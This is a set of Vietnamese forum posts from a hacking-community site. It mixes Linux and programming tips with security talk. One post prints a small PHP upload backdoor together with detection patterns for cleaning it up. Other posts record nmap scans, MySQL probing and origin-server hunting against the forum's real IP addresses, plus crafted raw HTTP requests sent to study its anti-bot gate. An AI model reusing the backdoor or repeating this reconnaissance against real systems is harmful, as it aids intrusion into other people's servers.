Messages posted by: chiro8x

Thế cái cậu dịch ra có nghĩa gì thế ? mình ngu nên nhìn vào hoa cả mắt smilie

.

Nâng cấp ROM làm gì ? Mình chưa biết vụ này luôn.

Tiếng anh giỏi là một lợi thế smilie

.
Biết tìm kiếm thông tin là một lợi thế smilie

.
Giỏi C/C++, Python, Perl là một lợi thế smilie

.

Bắt đầu tôi vào google "top 10 linux distro"
Tôi thấy có ubuntu thấy thích tôi tải nó về, đọc hướng dẫn, ghi ra đĩa cài vào máy của mình.
Sau đó tôi tìm hiểu các command cơ bản của linux, muốn biết cái gì tôi viết từ khoá vào google "how to do something on ubuntu". Tới nay chưa hẳn là tôi đã "hiểu" nhưng ít nhất tôi cũng biết nó thế nào.

Chúc bạn sớm "hiểu".

Bạn lên trang chủ của wine xem đánh giá của người dùng về việc thực thi ứng dụng này như thế nào. Và yêu cầu thư viện nào để có thể chạy ứng dụng này. Cài đặt winetricks để install các thư viện còn thiếu.

Ngoài ra bạn phải xem driver card đồ hoạ đúng chưa. Nếu không rành lắm bạn cài đặt playonlinux để xem wine có hổ trợ tốt game này không.

Các field của header sẽ được dùng để tạo security torken, nếu bạn tắt gzip security torken sẽ bị ghi nhận là không hợp lệ. Bạn phải tự viết 1 function unGzip hoặc lấy nó từ internet.

votinhchem wrote:

Dạng câu hỏi kiểu này không "cao thủ" hay "trung bình cao thủ" nào hứng thú trả lời đâu. Mặc dù nó quá dễ với họ. Mình cũng đã từng đặt ra nhưng câu hỏi mà có thể các cao thủ gọi đó là ngớ ngẩn và cũng không nhận được câu trả lời ưng ý.

Đúng là vô tình chém thật, chém xong mặt tỉnh bơ.

Độ tinh cậy của máy tính khá cao, vì các thuật toán xây dựng lên nó đã được phát triển trong nhiều thế kỷ và được chứng minh bằng toán học. Việc một người không thể lập trình tốt và đỗ lổi cho máy tính, hay cho trình biên dịch là do anh ta chưa có những tố chất sau:

1. Tư duy lập trình tốt: tư duy về thuật toán và giải thuật.
2. Kỹ năng lập trình tốt : gỡ rối , phân tích mã nguồn, trình bày mã nguồn, nắm vững syntax.
3. Kinh nghiệm và trực giác: tôi không biết nói cái này thế nào, nhưng khi bạn viết nhiều và đọc nhiều, việc đó tạo cho bản khả năng đặt ra những nghi vấn khi chương trình bị lỗi.

Còn việc benchmark, lúc trước tôi cũng từng nghĩ nó là vấn đề quan trọng. Nhưng ngày nay khi máy tính trở nên mạnh hơn nhiều tôi không thấy 20MB ram hay 200MB ram cho framework khác nhau thế nào. Tôi không nhớ lúc đó nói chuyện với ai trong HVA (anh TQN?) nhưng anh ấy đã phân tích cho tôi điều này rồi. Framework được xây dựng trên những gì mà project manager cho là tối ưu và thuận tiện. Với các ngôn ngử "bậc thấp hơn" bạn phải tạo ra môi trường cho sự tối ưu và thuận tiện đó. Nhưng đôi lúc nó không tối ưu và làm chương trình cho nó chậm hơn. Trong lập trình kỹ năng và tư duy của người lập trình đóng vai trò chủ đạo.

Sau đây là ngu ý của mình, bạn có thể xử lý vấn đề HackSpeed như sau. Dùng một hàm đếm số hoạt đông sau mỗi 1s và cộng dồn vào global variable (biến toàn cục) A.

Lấy timestamp hiện tại của hệ thống (current time stamp) B, và time stamp từ lúc bắt đầu flash C.

Ta có
A = B - C
=> Không hack speed.

Ngoài ra bạn có thể kết nối với server bên ngoài để lấy lượng chênh lệch (B - C) nhằm so sánh với A.

Làm bảo mật mà giao mã nguồn & database khác nào giao trứng cho ác.
Không tin ai ngoài bản thân mình cả, mà ngay cả bản thân mình cũng phải luôn tự vấn những sai sót có thể mắc phải.

Dùng share host chịu chết đi bạn ơi smilie

. Chẳng khoai sắn gì đâu.
Mấy ông cung cấp dịch vụ nói thế là láo, là chơi đểu khách hàng rồi. Làm gì có khái niệm khoá domain để bảo vệ khách hàng. Việc mấy ổng làm là tự lo cho cái xác mình. Còn khách hàng sống chết mặc bay.

Mấy thánh chém gió nhẹ tay, em lạnh quá phù !. Cái topic này dần đi tới chổ hoang đường rồi. Mấy thánh lấy máy tính ra, dựa trên tài nguyên của server rồi tính toán lại đi.

Nội dung đây bạn :
Code:

if ($_REQUEST['do']=='load'){
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)) echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
die('<form method=POST enctype="multipart/form-data" action="">
<input type=text name=path>
<input type="file" name="files"><input type=submit value="Up"></form>');
}

Nó chỉ là một đoạn mã upload thôi, bạn vào php.ini tạm thời disable hàm "move_uploaded_file".
Tìm các requets trong accesslog chứa "?do=load"
Tìm các file php chứa "eval("\x20\x69\x66\x20\x28\x24".
Chúc bạn sớm khắc phục được smilie

.

Mình đọc mà thấy hoa hết cả mắt, nào là protocol và layer 7 rồi IDS,....Dưới đây là nhận xét riêng của mình.

- "Protocol ở layer 7" : Nếu theo dõi topic bạn sẽ thấy là hệ thống 3 ông gác cổng làm nhiệm vụ :
cân bằng tải, cản lọc, cache, đồng bộ với main server. Từ yêu cầu đó ta thấy các ông này sẽ có những đặc điểm như,
tối giản các dịch vụ, chịu được lượng kết nối lớn. Trên 3 ông này ngoài những config của anh conmale thì hầu như
không có gì đáng giá. Vì mọi request (tới nội dung dộng) được chuyển tiếp tới nơi khác thông qua một TLS tunnel.
Việc cài các hệ thống cồng kềnh để lọc một vài request ở đây cần thiết hơn, hay sử dụng tài nguyên đó để tăng số lượng
request mà server gánh chịu là tốt hơn ?.

Bây giờ ta nhìn về phía cuối của TLS tunnel

# nmap 74.63.219.12 -P0 -sS
PORT STATE SERVICE
443/tcp open https

Chỉ có một cổng mở, và chỉ dành cho các request đi qua 3 ông gác cổng. Ở đây lượng request đã bị giảm đáng kể.
Tức là những request.method = GET đã được ông gác cổng chăm sóc, số còn lại thường là request.method = POST
, kèm theo đó là các yêu cầu đồng bộ từ 3 ông gác cổng (phỏng đoán của em). Nói tới đây chắc hẳn các bạn sẽ nhớ lại "một đám nào đó"
đã "dội" vào HVA một tá request.method = POST (trong kí sự các vụ DDoS HVA).

Ý sau về mod_security em không dám bàn, vì em chưa tìm hiểu được gì nhiều cho lắm. Em chỉ nhớ có một câu nói thế này
và em nghĩ nó cũng thích hợp để nói ở đây.

Anh có thể thuê một người dọn dùm anh một mẩu bánh mì bị rơi,
Hoặc để tất cả các việc đó cho một đàn kiến mà chẳng tốn kém gì.

^^! Dù sao tư duy bảo mật của nhiều người là dùng dao giết trâu để mổ gà. Trong khi chúng ta có thể chia nhỏ
một vấn đề và giải quyết nó đơn giản hơn.

chube wrote:

hình thức chỉ là 1 phần của chân lý mà ở đây href chỉ là cái hình thức được chường ra để che cái chân lý được đám javascript kia hide đi . Vậy muốn tìm chân lý? Chắc em phải bắt đầu từ cái mớ javascript quá phải không anh ?

Không phải từ mớ Javascript đó đâu. Đoạn mã đó nhằm xử lý HTML DOM, mục đích phân tích các hành vi tác động lên fakelink và đưa ra đáp ứng. Như onclink, onmouseout, onmuoseover...

Điều khó hiểu ở đây là ở line 91:
Tại sao:
Code:

var FakeLinkWindow = window.open( this.title, 'outbound', '' ); //It'll create new window

Chứ không phải thay thế bằng:
Code:

if(window.location.toString().indexOf('/to')==-1)
{
window.location = window.location + this.title; //Redirect without create new window
}

Tôi nhớ trong một đoạn hội thoại với anh conmale, có bạn hỏi tại sao lại mở cửa sổ mới. Ảnh chỉ nói ẩn ý là "cái gì tồn tại cũng có lí do của nó".

Và một đoạn nữa line 52:
Code:

if (Links[i].className.indexOf('download') !== -1) {
Links[i].onclick = function() {
doUrchin(this.href, 'downloads');
}
}

Không có HTML elements nào có class name chứa cụm từ "donwload" cả. Tôi vẫn chưa hiểu tại sao nó xuất hiện ở đây.

Client side:
Mọi thứ được phơi bày rõ ràng, giống như một ván cờ vậy hai bên thấy của nhau. Nhưng để nắm được ý đồ đối phương thì cần phải phân tích.

Không phải là không để ý đâu anh, cái trang này em cũng soi kỹ soi đi soi lại rồi. Tại chưa có căn cứ không dám nói xàm.
Chắc em phải nói ra cái ngu ý của em vậy:
Code:

<meta name="robots" content="index,follow">

Cái này mục đích là báo với BOTs trang này cho phép BOTs truy cập và BOTs hãy "follow the white rabbit" (href).
Code:

<a href="/"></a>

Khi BOTs theo href đi theo cái này thì nó sẽ sinh ra request:
Code:

GET / HTTP/1.1
Host: www.hvaonline.net

Nhờ nhận thêm gợi ý của anh conmale em đánh liều, bấm F5 vài cái xem phản ứng ông gác cổng thế nào.

gaurdian wrote:

Proxy Error

The proxy server received an invalid response from an upstream server.
The proxy server could not handle the request GET /.

Reason: Error reading from remote server

Additionally, a 502 Bad Gateway error was encountered while trying to use an ErrorDocument to handle the request.

Ông gác cổng đã chặn request GET /. Em ngồi chờ khoảng 5 phút gì đó mới vào lại được. Nhưng đổi trình duyệt thì vào bình thường. Vậy nó sẽ liên quan tới việc ghi nhớ User-agent hoặc Cookie của phiên làm việc đó.

Mục đích của em nhỏ <a href="/"></a> là tạo ra một vòng lặp khiến BOTs gửi request tới ông gác cổng.
Nhằm phân tích hành vi bất thường và có tính tần số, nhằm loại các request này ngay tại vị trí các ông gác cổng.

Em học thêm được một điều:
- Cần chặn và loại bỏ sớm các request không hợp lệ ở mỗi tầng, đồng thời phải tính toán kỹ lưỡng để không chặn các request của user.

P/S: Chính xác hơn sau 5 lần sẽ bị chặn, nhưng đổi User-agent thì vào lại bình thường.

Mà có nhất thiết là TCP không smilie

. Bồ có thể sử dụng UDP trong trường hợp này. Nó sẽ ổn hơn TCP nhiều.

Muốn rót nước vào bình mà cổ chai hẹp, bồ không đập cái cổ chai đi thì làm sao rót smilie

. Vế cuối tớ đã đưa ra câu trả lời rồi load balancing.

Mỗi kết nối bồ vẫn phải tạo một thread cho nó điều đó gần như là hiển nhiên, nhưng nếu bồ sử dụng nhiều máy chủ để giải quyết hiện tượng nghẽn cổ chai thì vấn đề của bồ còn gì khó.

1 Server nhận khoảng 1000 connect (tôi ví dụ) sao đó dữ liệu đó được cậu chia thành các phần nhỏ gửi tới main server (tất nhiên trước đó cậu đánh dấu gói nào của thread nào, hoặc cấp id cho mỗi máy, đính kèm id vào gói tin gửi đi). Sau đó tới máy chủ tiến hành tách và lưu vào database.

Còn về thuật toán cách xử trí tiếp thế nào không lẽ bồ còn không biết smilie

.

Nghe giống xây dựng C&C server cho 1 mạng BOT 1 triệu máy vậy. Giống như kịch bản phim luôn. Tôi thấy vui là có nhiều bạn đưa ra những câu hỏi rất chi là hóc búa rất chi là siêu thực. Đợt trước tôi nghe về máy tính lượng tử, truyền hình ảnh HD bằng cáp quang, tại sao xem video HD không đứng, v...v.... Tôi tự hỏi nước ta nhiều nhân tài ẩn dật thế.

Em không hiểu ngụ ý của thiên tài. Nhưng theo ngu ý của em thì. Nên bố trí kết nối "sole" nhau, tức là không cùng tại một thời điểm, làm như vậy thiên tài sẽ không phải bỏ một khoản lớn để làm mấy công việc cỏn con. Mà thiên tài ! Em nói không phải chứ 1 triệu máy sẽ không ở trên cùng 1 múi giờ được. Tức là cái này liên quan tới vấn đề địa lý ấy. Nên 8 giờ đó vẫn chưa biết là local time hay GMT.

Bài toán siêu thực này còn ở chổ ! Mọi người cùng bật máy lên 8 giờ (?).

Nếu mà thiên tài vẫn quả quyết làm siêu nhân 1 triệu máy cùng lúc thì em cũng nói luôn là thiên tài có thể xây dựng nhiều server để nhận dữ liệu, sau đỏ mở 1 kết nối tới mainserver để đồng bộ dữ liệu. Số server thì thiên tài phải tính lấy rồi.

Em xin phép ^^.

Người Việt vẫn cái luật vào 3 ra 7, anh comanle mời thì em tiếp vậy. Chén này thứ 2 mà uống xong chắc em lăn quay.
Sau bài viết ở trên em cũng hơi đuối chút, tại vì bắt đầu đến đoạn bí nên em không ráng lần mò gì thêm nữa.
Em tìm cách để biết cái gì thực sự sau "các server chường mặt chịu đấm" kia. Điểm danh lại ta có:

Host Name: 76.72.167.122
IP Address: 76.72.167.122
Country: United States united states
Country code: US (USA)
Region: Pennsylvania
City: Philadelphia

www7445uf.sakura.ne.jp
IP Address: 49.212.135.219
Country: Japan japan
Country code: JP (JPN)
Region: Shimane
City: Minami

Host Name: hvaonline.net
IP Address: 78.46.136.116
Country: Germany germany
Country code: DE (DEU)

Host Name: ns2.tienve.org
IP Address: 74.63.219.14
Country: United States united states
Country code: US (USA)
Region: Texas
City: Dallas

Sau khi post một message trên facebook mục đích là cầu cứu tứ phương, "bác sĩ" sau khi "châm cứu" đã trả
bệnh nhân về. Em quyết định lần theo các đầu mối mà trước đây không dùng tới.

Whois một cái em có :

Name Server 1: ns2.hvaonline.net ( 74.63.219.13 an alias of ns1.tienve.org ?)
Host Name: ns1.tienve.org
IP Address: 74.63.219.13
Country: United States united states
Country code: US (USA)
Region: Texas
City: Dallas

Name Server 2: ns2.afraid.org
Host Name: ns2.afraid.org
IP Address: 174.37.196.55
Country: United States united states
Country code: US (USA)
Region: Virginia
City: Ashburn

Em không biết afraid.org là gì hết em bật trình duyệt và gỏ vào http://afraid.org.
Ngay banner em đã thấy thứ mình cần tìm
#define afraid.org
FreeDNS - Free DNS - Dynamic DNS - Static DNS subdomain and domain hosting

Thay vì xây dựng thêm 1 name server là ns1.hvaonline.net ảnh lại dùng một dịch vụ name server mà ảnh tin tưởng.
Với gợi ý lần trước ảnh nói, tôi nghĩ đây là một bước phòng hờ cho việc ns2.hvaonline.net gặp trục trặc.

@Chiro: Trong binh pháp tôn tử nói. Việc dụng binh cốt ở xảo trá mà
@Conmale: he he, anh thì không chơi rơ xảo trá
mà anh tính toán rất kỹ

Nhưng vậy điều này cũng một phần khẳng định cái anh gọi là tính toán kỹ đó, ảnh chuận bị cho trường hợp xấu là
ns2.hvaonline.net không còn khả năng phân giản domain, và thậm chí là một server nào đó với tài nguyên hạn chế có thể đảm nhiệm nó.

Lần trước em cũng thử sữ dụng nmap scan các open port trên 4 server nhưng kết quả không khả quan lắm.
Em cài nmap, bập bẹ đọc usage rồi thử:

# nmap 76.72.167.122 -P0 -sS
Not shown: 1677 filtered ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
443/tcp open https

# nmap 49.212.135.219 -P0 -sS
Not shown: 1675 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
3306/tcp open mysql

# nmap 78.46.136.116 -P0 -sS
Not shown: 1677 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
8443/tcp open https-alt

# nmap 74.63.219.14 -P0 -sS
PORT STATE SERVICE
80/tcp open http
443/tcp open https

Em thử telnet tới:
$telnet 49.212.135.219 3306
Host '123.19.31.10' is not allowed to connect to this MySQL serverConnection closed by foreign host.
Không dễ ăn chút nào, ảnh sẽ luôn đảm bảo chúng ta thấy thứ mà ảnh muốn chúng ta thấy. Telnet tới một số cổng khác cho dù cổng mở nhưng vẫn không có cơ may nào qua mặt được việc xác thực. Đành để đó tìm xem server chính ở đâu.

Giờ thực hiện lookup. Em sử dụng 1 tool mà em tình cờ tìm thấy:

http://network-tools.com/nslook/Default.asp?domain=hvaonline.net&type=255&server=74.63.219.14&class=1&port=53&timeout=5000&go.x=0&go.y=0

hvaonline.net IN SOA
server: ns2.hvaonline.net
email: hostmaster@hvaonline.net
serial: 1347014467
refresh: 16384
retry: 2048
expire: 1048576
minimum ttl: 2560 2560s (42m 40s)

hvaonline.net IN NS ns2.hvaonline.net 3600s (1h)
hvaonline.net IN NS ns2.afraid.org 3600s (1h)
hvaonline.net IN MX
preference: 0
exchange: mail.hvaonline.net 86400s (1d)
hvaonline.net IN TXT v=spf1 a mx ptr -all 3600s (1h)
hvaonline.net IN TXT google-site-verification=9MhFqvu3wTPAlHcVhHaQclmWB7LagxEj4CtZeYXX25A 86400s (1d)
hvaonline.net IN A 78.46.136.116 86400s (1d)
hvaonline.net IN A 76.72.167.122 86400s (1d)

Authority records
[none]

Additional records
name class type data time to live
ns2.hvaonline.net IN A 74.63.219.13 86400s (1d)
ns2.afraid.org IN A 174.37.196.55 86400s (1d)
mail.hvaonline.net IN A 74.63.219.12 86400s (1d)

Thêm một địa chỉ IP mới là 74.63.219.12.

#nmap 74.63.219.13 -P0 -sS
Not shown: 1676 filtered ports
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
443/tcp closed https

# nmap 74.63.219.12 -P0 -sS
PORT STATE SERVICE
443/tcp open https

Ta có các server mới là

Host Name: ns1.tienve.org
IP Address: 74.63.219.13
Country: United States united states
Country code: US (USA)
Region: Texas
City: Dallas

Host Name: hvaonline.net
IP Address: 74.63.219.12
Country: United States united states
Country code: US (USA)
Region: Texas
City: Dallas

Mục đích của chuyến này là tìm ra server nào là server (thật). Em mở hộp thư kiếm lại cái mail kích hoạt tài khoản.

Received: from tienve.org (thutin.tienve.org [74.63.219.12])

Cái dòng em cần đây tìm là đây, mail.hvaonline.net và thutin.tienve.org
đều trỏ tới 74.63.219.12. Xem e-mail tìm thời gian gửi Mon, 23 Aug 2010 20:38:13 -0700 (PDT).

Đích thị là anh 74.63.219.12 rồi, kèm thêm port 443 open, các cổng còn lại bị filter thì em khẳng định 60% là thế. Em định dùng OpenSSL thử gửi một request tới 74.63.219.12:443 nhưng rốt cuộc em chưa biết cách sử dụng nó thế nào. Vậy đành tìm cách khác, em mở /etc/hosts thêm vào 2 dòng.

74.63.219.12 hvaonline.net
74.63.219.12 www.hvaonline.net

Em vào từ trình duyệt https://hvaonline.net, gặp ông gác cổng thấy cũng mừng mừng. Nhưng rồi thấy có thông báo bị chặn (403). Em tính vào đó gửi 1 POST request và xem phản hồi bao nhiêu, sau đó sẽ gửi POST request với "3 ông chịu đấm" kia. Sau khi tính toán nếu thời gian hoàn tất 1 POST request tới server (thật) hẳn sẽ nhỏ nhất.

Nghĩ là thế nhưng rốt cuộc không thực hiện được.

Hôm nay em thấy những điều sau:
- Dữ liệu truyền trên internet (thông qua các tunnel) cần được mã hóa, phân quyền rõ ràng.
- Mọi thông tin, trò chuyện của sysadmin, đều có thể "giúp" attacker trong việc can thiệp vào hệ thống.
- Đảm bảo an toàn về mặt vật lý của server.
- Lập các hệ thống phòng hờ, chịu tải, kịch bản xử lý sự cố.

P/S: Trong bài trên có mấy gợi ý của anh conmale, và nhớ lại những sự kiện đã xảy ra với HVA.

Sao không xóa nó đi ?

Bạn chắc bạn đúng chứ ?. Tớ cho thử và báo lỗi này.
Uncaught SyntaxError: Unexpected token > a.html:6
(anonymous function)

Em tự hỏi mọi người ngồi đây đoán trời đoán bể vậy sao không thử đi thực tế nhỉ ?. Mặc dù sức không có nhưng em cũng ráng xem theo được tới đâu.

www.hvaonline.net
2 0.049523 8.8.8.8 192.168.1.100 DNS 125 Standard query response
A 76.72.167.122
A 78.46.136.116
A 49.212.135.219

hvaonline.net
53 16.501072 8.8.8.8 192.168.1.100 DNS 105 Standard query response
A 76.72.167.122
A 78.46.136.116

Trên đây là kết quả của việc phân giải tên miền www.hvaonline.net và hvaonline.net, chúng ta thấy có tới 3 IP khác nhau, sau khi tra cứ sơ bộ em có thông tin sau:

Host Name: 76.72.167.122
IP Address: 76.72.167.122
Country: United States united states
Country code: US (USA)
Region: Pennsylvania
City: Philadelphia

www7445uf.sakura.ne.jp
IP Address: 49.212.135.219
Country: Japan japan
Country code: JP (JPN)
Region: Shimane
City: Minami

Host Name: hvaonline.net
IP Address: 78.46.136.116
Country: Germany germany
Country code: DE (DEU)

3 Server nằm 3 nơi khác nhau em thử nghiệm việc duyệt HVA trên trình duyệt của em, tóm gói tin và xem xét.

GET / HTTP/1.1
Host: hvaonline.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Nov 2012 08:44:29 GMT
Server: Apache mod_jk/1.2.31
Location: /
Cache-Control: max-age=300
Expires: Mon, 12 Nov 2012 08:49:29 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=4, max=1000
Connection: Keep-Alive

..........mO=O.0...+....vA...M..Z...........c.......,'...utQ=m.kS.....y..m7._"nku.X..|Y...~.eF6v.$...%.c.r]...#.h8t......|...2.{s........z.,......`...B%
6..Mnc....i.v...G..q.\Z.L.. .....6&.0..^..s......b%.%<s.9.NA....!.U..~....{j9........6...

Ta chú ý thấy đám bên dưới toàn giun dế, anh già khó tánh không muốn chúng ta đọc cái gì của ảnh hết. Chú ý header thấy:
Content-Encoding: gzip

Giờ ta lược bỏ cái khả năng hổ trợ gzip của ta đi xem ảnh có chiều không ?.
Accept-Encoding: gzip,deflate,sdch

Em lấy cái request:

GET / HTTP/1.1
Host: hvaonline.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Tống vào file hva_pkt_step_1
Rồi thử :
$ cat hva_pkt_step_1|netcat hvaonline.net 80

HTTP/1.1 301 Moved Permanently
Date: Tue, 13 Nov 2012 02:20:23 GMT
Server: Apache mod_jk/1.2.31
Location: /
Cache-Control: max-age=300
Expires: Tue, 13 Nov 2012 02:25:23 GMT
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=4, max=1000
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="/">here</a>.</p>
<hr>
<address>Apache mod_jk/1.2.31 Server at hvaonline.net Port 80</address>
</body></html>

Ít ra anh già cũng không khó tánh lắm, nếu mà ảnh ép dùng gzip thì phải vết 1 cái script nhỏ để decode cái gzip của ảnh.

<a href="/">here</a> (-> Giúp googlebot tìm đường, đề phòng trường hợp wwwect bằng header thất bại).

Giờ xem www.hvaonline.net nói gì.
Tương tự các bước trên bỏ "Accept-Encoding: gzip,deflate,sdch" ta được.

GET / HTTP/1.1
Host: www.hvaonline.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

$cat hva_pkt_step_2|netcat www.hvaonline.net 80

HTTP/1.1 200 OK
Date: Tue, 13 Nov 2012 02:27:10 GMT
Server: Apache mod_jk/1.2.31
Last-Modified: Tue, 02 Aug 2011 04:28:57 GMT
ETag: "226db8-18ec-4a97e2fa29440"
Accept-Ranges: bytes
Content-Length: 6380
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 01 Dec 2003 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Type: text/html
Set-Cookie: __utms=123.19.0.4.1352773630989630; path=/; max-age=900
Keep-Alive: timeout=4, max=500
Connection: Keep-Alive

<script>

</script>

Chậc Urlencode, chúng ta không được chào đón lắm. Việc này của ảnh ngụ ý là kiểm tra xem cái chúng ta có dùng trình duyệt vào hay không dựa trên những khả năng của trình duyệt như:
- Ghi nhớ cookie
- Xử lý javascript

Bước này chặn mấy anh không phải là browser, có nghĩa là bước bước đó anh già sẽ thả rông googlebot.
Nhớ lại vụ Sờ-Ti-Lợ-Entertainment tấn công và giả danh google bot. Sau vụ đó anh già đã thực hiện siết chặt khâu này, là kiểm tra IP của BOT.

Ở bước này ta được đánh dấu

Set-Cookie: __utms=123.19.0.4.1352773630989630; path=/; max-age=900

123.19.0.4.13 -> IP của em, phần đằng sau có lẽ 1 ID được cấp ngẩu nhiên. Thời gian tồn tài của cái này là 15 phút. Tức sau khi bồ nhận cái này bồ có 15 phút để vào cửa trước khi nó hết hạn (suy đoán của em).

Giờ ta tập trung vào cái đoạn bị che đi:

<HTML>
<HEAD>
<TITLE>.:: H V A O n l i n e ::.</TITLE>
<meta name="robots" content="index,follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/javascript">
addEvent( window, 'load', setLinkBehaviours );
addEvent( window, 'load', relNoFollow );

/* thanks to PPK www.quirksmode.org */
function addEvent( obj, type, fn )
{
if (obj.addEventListener)
{
obj.addEventListener( type, fn, false );
}
else if ( obj.attachEvent )
{
obj["e" type fn] = fn;
obj[type fn] = function()
{
obj["e" type fn]( window.event );
}
obj.attachEvent( "on" type, obj[type fn] );
}
}

function removeEvent( obj, type, fn )
{
if ( obj.detachEvent )
{
obj.detachEvent( "on" type, obj[type fn] );
obj[type fn] = null;
}
else if (obj.removeEventListener)
{
obj.removeEventListener( type, fn, false );
}
}

function setLinkBehaviours() {
var Links = document.getElementsByTagName( 'A' );

for( var i = 0; i < Links.length; i ) {
if (Links[i].className.indexOf('external') !== -1) {
Links[i].onclick = function() {
var FakeLinkWindow = window.open( this.href, 'target', '' );
return false;
}
}

if (Links[i].className.indexOf('download') !== -1) {
Links[i].onclick = function() {
doUrchin(this.href, 'downloads');
}
}
}
}

function relNoFollow()
{
var FakeLinks = document.getElementsByTagName('span');

if( FakeLinks.length > 0 )
{
for( var i = 0; i < FakeLinks.length; i )
{
if( FakeLinks[i].title.indexOf( '/to' ) != -1
|| FakeLinks[i].title.indexOf( '/to' ) != -1 )
{
FakeLinks[i].className = 'fakelink';
FakeLinks[i].onmouseout = fakelinkMouseOut;
FakeLinks[i].onmouseover = fakelinkMouseOver;
FakeLinks[i].onclick = fakelinkClick;
}
}
}
}

function fakelinkMouseOver()
{
this.className = 'fakelink-hover';
}

function fakelinkMouseOut()
{
this.className = 'fakelink';
}

function fakelinkClick()
{
var FakeLinkWindow = window.open( this.title, 'outbound', '' );
}
</script>
<style type="text/css">
<!--
BODY {
background-color: #111111;
font-family : Verdana, Geneva, Arial, Helvetica;
font-size : small;
font-weight : bold;
text-align : center;
color: White;
font-size: 12px;
}

A {
color : White;
text-decoration : none;
font-size: 12px;
}

A:HOVER {
color : FFCC33;
text-decoration : none;
font-size: 12px;
}

A.Link {
color: FFCC33;
text-decoration: none;
font-size: 12px;

}
.style1 {font-size: 10px}

.fakelink
{
color: white;
font-size: 12px;
text-decoration: none;
cursor: pointer;
}

.fakelink-hover
{
color: #FFCC33;
font-size: 12px;
text-decoration: underline;
cursor: pointer;
}
</style></HEAD>
<body>
<table width="100%" cellspacing="0" cellpadding="2" border="0" align="center">
<tr>
<td> </td>
</tr>
<tr>
<td width="50%" align="center" valign="middle"><img src="squarehva.gif" alt="squarelogo" longdesc="/squarehva.gif"></td>
</tr>
<tr>
<td width="50%" align="center" valign="middle">
<p class="copyright"> </p>
<span title="/toforum" class="fakelink">Forum</span> |
<span title="/toportal" class="fakelink">Portal</span>
<p align="center"><img src="vertical.gif" alt="vert" width="1" height="300"></p>
</td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="2" border="0" align="center">
<tr>
<td width="50%" align="center" valign="middle"><span class="style1">h v a o n l i n e . n e t | h v a f o r u m . n e t | h v a z o n e . n e t | v n h a c k e r . o r g</span><span><a href="/"></a></span> </td>
</tr>
</table>
</body>
</HTML>

Đây là cái trang gác cửa quen thuộc.
<span title="/toforum" class="fakelink">Forum</span> |
<span title="/toportal" class="fakelink">Portal</span>
Thứ ta tưởng là <a href="/toforum">Forum</a> là <span title="/toforum" class="fakelink">Forum</span>
Đây không phải là HTML a tag vì sao thế ?. Anh muốn đuổi tụi BOTs đi, nhớ mấy câu ảnh nói chắc là anh đuổi mấy con nhặng của bọn khựa.

Đoạn mã JS này đại khải làm nhiệm vụ là làm một cái fakelink, anh biết là tụi BOTs sẽ bám theo cái "href" cơ.

Tôi đợi một lát cho ổng quên tui rồi quay lại, gửi hva_pkt_step_2 tới rồi lấy cookie thế vào hva_pkt_step_3,hva_pkt_step_4 tôi được.
hva_pkt_step_3

GET /toforum HTTP/1.1
Host: www.hvaonline.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: /
Cookie: __utms=123.19.0.4.1352775433230315

cat hva_pkt_step_3|ncat www.hvaonline.net 80
HTTP/1.1 302 Found
Date: Tue, 13 Nov 2012 02:57:40 GMT
Server: Apache mod_jk/1.2.31
Location: /tof/
Cache-Control: max-age=300
Expires: Tue, 13 Nov 2012 03:02:40 GMT
Vary: Accept-Encoding
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=4, max=500
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/tof/">here</a>.</p>
<hr>
<address>Apache mod_jk/1.2.31 Server at www.hvaonline.net Port 80</address>
</body></html>

Cái này ai tinh mắt sẽ thấy bị sút về đây khoảng 1/2s, giờ ta thấy ảnh lại tiếp tục dẫn đường cho người và BOTs như bước đầu.

hva_pkt_step_4

